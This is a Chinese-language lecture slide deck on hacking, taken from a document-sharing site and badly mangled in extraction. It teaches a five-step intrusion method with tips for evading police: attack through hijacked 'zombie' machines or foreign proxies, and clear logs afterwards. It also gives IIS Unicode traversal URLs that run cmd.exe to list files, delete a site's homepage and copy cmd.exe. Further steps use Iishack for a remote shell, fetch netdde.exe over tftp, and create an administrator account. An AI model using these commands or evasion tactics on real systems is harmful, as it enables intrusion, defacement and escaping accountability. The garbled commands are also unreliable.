信息安全入门第六课课件

上传人:仙*** 文档编号:243923736 上传时间:2024-10-01 格式:PPT 页数:30 大小:90.50KB
返回 下载 相关 举报
信息安全入门第六课课件_第1页
第1页 / 共30页
信息安全入门第六课课件_第2页
第2页 / 共30页
信息安全入门第六课课件_第3页
第3页 / 共30页
点击查看更多>>
资源描述
单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,*,*,*,黑客,攻击技术,黑客概述,什么是黑客?黑客是“,Hacker”,的音译,源于动词,Hack,,其引申意义是指“干了一件非常漂亮的事”。这里说的黑客是指那些精于某方面技术的人。对于计算机而言,黑客就是精通网络、系统、外设以及软硬件技术的人。,什么是骇客?有些黑客逾越尺度,运用自己的知识去做出有损他人权益的事情,就称这种人为骇客(,Cracker,,破坏者)。,黑客的行为发展趋势,网站被黑可谓是家常便饭,世界范围内一般美国和日本的网站比较难入侵,韩国、澳大利亚等国家的网站比较容易入侵,黑客的行为有三方面发展趋势:,手段高明化,活动频繁化,动机复杂化,黑客精神,要成为一名好的黑客,需要具备四种基本素质:“,Free”,精神、探索与创新精神、反传统精神和合作精神。,1,、“,Free”(,自由、免费,),的精神,需要在网络上和本国以及国际上一些高手进行广泛的交流,并有一种奉献精神,将自己的心得和编写的工具和其他黑客共享。,2,、探索与创新的精神,所有的黑客都是喜欢探索软件程序奥秘的人。他们探索程序与系统的漏洞,在发现问题的同时会提出解决问题的方法。,3,、反传统的精神,找出系统漏洞,并策划相关的手段利用该漏洞进行攻击,这是黑客永恒的工作主题,而所有的系统在没有发现漏洞之前,都号称是安全的。,4,、合作的精神,成功的一次入侵和攻击,在目前的形式下,单靠一个人的力量已经没有办法完成了,通常需要数人,数百人的通力协作才能完成任务,互联网提供了不同国家黑客交流合作的平台。,攻击五部曲,一次成功的攻击,都可以归纳成基本的五步骤,但是根据实际情况可以随时调整。归纳起来就是“黑客攻击五部曲”,1,、隐藏,IP,2,、踩点扫描,3,、获得系统或管理员权限,4,、种植后门,5,、在网络中隐身,1,、隐藏,IP,这一步必须做,因为如果自己的入侵的痕迹被发现了,当,police,找上门的时候就一切都晚了。,通常有两种方法实现自己,IP,的隐藏:,第一种方法是首先入侵互联网上的一台电脑(俗称“肉鸡”),利用这台电脑进行攻击,这样即使被发现了,也是“肉鸡”的,IP,地址。,第二种方式是做多极跳板“,Sock,代理”,这样在入侵的电脑上留下的是代理计算机的,IP,地址。,比如攻击,A,国的站点,一般选择离,A,国很远的,B,国计算机作为“肉鸡”或者“代理”,这样跨国度的攻击,一般很难被侦破。,2,、踩点扫描,踩点就是通过各种途径对所要攻击的目标进行多方面的了解(包括任何可得到的蛛丝马迹,但要确保信息的准确),确定攻击的时间和地点。,扫描的目的是利用各种工具在攻击目标的,IP,地址或地址段的主机上寻找漏洞。,3,、获得系统或管理员权限,得到管理员权限的目的是连接到远程计算机,对其进行控制,达到自己攻击目的。获得系统及管理员权限的方法有:,通过系统漏洞获得系统权限,通过管理漏洞获得管理员权限,通过软件漏洞得到系统权限,通过监听获得敏感信息进一步获得相应权限,通过弱口令获得远程管理员的用户密码,通过穷举法获得远程管理员的用户密码,通过攻破与目标机有信任关系另一台机器进而得到目标机的控制权,通过欺骗获得权限以及其他有效的方法。,4,、种植后门,为了保持长期对自己胜利果实的访问权,在已经攻破的计算机上种植一些供自己访问的后门。,5,、在网络中隐身,一次成功入侵之后,一般在对方的计算机上已经存储了相关的登录日志,这样就容易被管理员发现。,在入侵完毕后需要清除登录日志已经其他相关的日志。,攻击和安全的关系,黑客攻击和网络安全的是紧密结合在一起的,研究网络安全不研究黑客攻击技术简直是纸上谈兵,研究攻击技术不研究网络安全就是闭门造车。,某种意义上说没有攻击就没有安全,系统管理员可以利用常见的攻击手段对系统进行检测,并对相关的漏洞采取措施。,网络攻击有善意也有恶意的,善意的攻击可以帮助系统管理员检查系统漏洞,恶意的攻击可以包括:为了私人恩怨而攻击、商业或个人目的获得秘密资料、民族仇恨、利用对方的系统资源满足自己的需求、寻求刺激、给别人帮忙以及一些无目的攻击。,网络踩点,踩点就是通过各种途径对所要攻击的目标进行多方面的了解(包括任何可得到的蛛丝马迹,但要确保信息的准确)。,常见的踩点方法包括:,在域名及其注册机构的查询,公司性质的了解,对主页进行分析,邮件地址的搜集,目标,IP,地址范围查询。,踩点的目的就是探察对方的各方面情况,确定攻击的时机。模清除对方最薄弱的环节和守卫最松散的时刻,为下一步的入侵提供良好的策略。,网络扫描,黑客攻击五部曲中第二步踩点扫描中的扫描,,一般分成两种策略,:,一种是主动式策略,另一种是被动式策略。,网络扫描概述,被动式策略就是基于主机之上,对系统中不合适的设置,脆弱的口令以及其他同安全规则抵触的对象进行检查。,主动式策略是基于网络的,它通过执行一些脚本文件模拟对系统进行攻击的行为并记录系统的反应,从而发现其中的漏洞。,X-Scan,采用多线程方式对指定,IP,地址段,(,或单机,),进行安全漏洞检测,支持插件功能,提供了图形界面和命令行两种操作方式,扫描内容包括:远程服务类型,操作系统类型及版本,各种弱口令漏洞、后门、应用服务漏洞、网络设备漏洞、拒绝服务漏洞等二十几个类别。,SuperScan,功能强大的端口扫描工具。,1,)通过,Ping,来检验,IP,是否在线;,2,),IP,和域名相互转换;,3,)检验目标计算机提供的服务类别;,4,)检验一定范围目标计算机的是否在线和端口情况;,5,)工具自定义列表检验目标计算机是否在线和端口情况;,6,)自定义要检验的端口,并可以保存为端口列表文件;,7,)软件自带一个木马端口列表,trojans.lst,,通过这个列表可以检测目标计算机是否有木马;同时,也可以自己定义修改这个木马端口列表。,黑客的攻击方式,漏洞攻击,拒绝服务攻击,漏洞,漏洞是在硬件、,软件,、协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的,情况,下访问或破坏系统。,漏洞问题是与时间紧密相关的。,一个系统从发布的那一天起,随着用户的深入使用,系统中存在的漏洞会被不断暴露出来,这些早先被发现的漏洞也会不断被系统供应商发布的,补丁,软件修补,或在以后发布的新版系统中得以纠正。,而在新版系统纠正了旧版本中具有漏洞的同时,也会引入一些新的漏洞和错误。因而随着时间的推移,旧的漏洞会不断消失,新的漏洞会不断出现。漏洞问题也会长期存在。,Unicode,漏洞攻击,Unicode,用“,%2f”,和“,%5c”,分别代表“,/”,和“,”,字符,但也可用“超长”序列来代替这些字符。“超长”序列是非法的,Unicode,表示符,如用“,%c0%af”,代表“,/”,字符。,由于,IIS,(,Internet Information Services,,互联网信息服务),,不对超长序列进行检查,因此在,URL,中添加超长的,Unicode,序列后,可绕过微软的安全检查。,未经授权的用户可能利用,IUSR_machinename,账号的上下文空间访问任何已知的文件。,利用该漏洞读取出计算机上目录列表,比如读取,C,盘的目录,只要在浏览器中输入,http:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir+c:,利用语句得到对方计算机上装了几个操作系统以及操作系统的类型,只要读取,C,盘下的,boot.ini,文件就可以了。使用的语句是:,http:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+type+c:boot.ini,利用,Unicode,漏洞删除主页,利用,Unicode,可以方便的更改对方的主页,比如现在已经知道对方网站的根路径在“,C:,Initpubwwwroot,”,(系统默认)下,可以删除该路径下的文件“,default.asp,”,来删除主页,这里的“,default.asp,”,文件是,IIS,的默认启动页面。,使用的语句是:,http:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+del+c:inetpubwwwrootdefault.asp,拷贝文件,为了是使用方便,利用语句将,cmd.exe,文件拷贝到,scripts,目录,并改名为,c.exe,,使用的语句是:,http:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+copy+C:winntsystem32cmd.exe+c.exe,查看,C,盘的目录,以后使用,cmd.exe,命令就方便了,比如查看,C,盘的目录,使用的语句就可以简化为:,http:/172.18.25.109/scripts/c.exe?/c+dir+c:,利用,Unicode,漏洞入侵系统,要用,X-scan,扫描存在,Unicode,漏洞的主机。,一般都采用,IIS hack,攻击方法进行攻击,但是需要工具,Iishack,和,TFTP,还有,netdde,。,入侵步骤,1,、将,TFTP,装到机器中,将自己的机器变成一个,FTP,服务器,搜索有,Unicode,漏洞的,IP,地址,如:,192.168.0.184.,2,、在命令提示符窗口中输入:,Iishack,192.168.0.184 80 99,3,、如果显示攻击成功,则再输入:,telnet 192.168.0.184 99,。可以进入到“,c:winntsystem32”,里面,4,、运行“,c:winntsystem32tftp i,自己的,ip,get,netdde.exe,”,,再运行,netdde.exe,文件,建立一个账号,将它的权限提升到管理组:,c:winntsystem32netdde.exe net user make love/add,c:winntsystem32netdde.exe net local administrator make/add,5,、最后用“,net use,192.168.0.184ipc$,love/,user:make,”,建立,ipc,连接,进行非法操作。这时入侵者,对硬盘上的东西可以任意操作了。,
展开阅读全文
相关资源
正为您匹配相似的精品文档
相关搜索

最新文档


当前位置:首页 > 管理文书 > 施工组织


copyright@ 2023-2025  zhuangpeitu.com 装配图网版权所有   联系电话:18123376007

备案号:ICP2024067431-1 川公网安备51140202000466号


本站为文档C2C交易模式,即用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。装配图网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知装配图网,我们立即给予删除!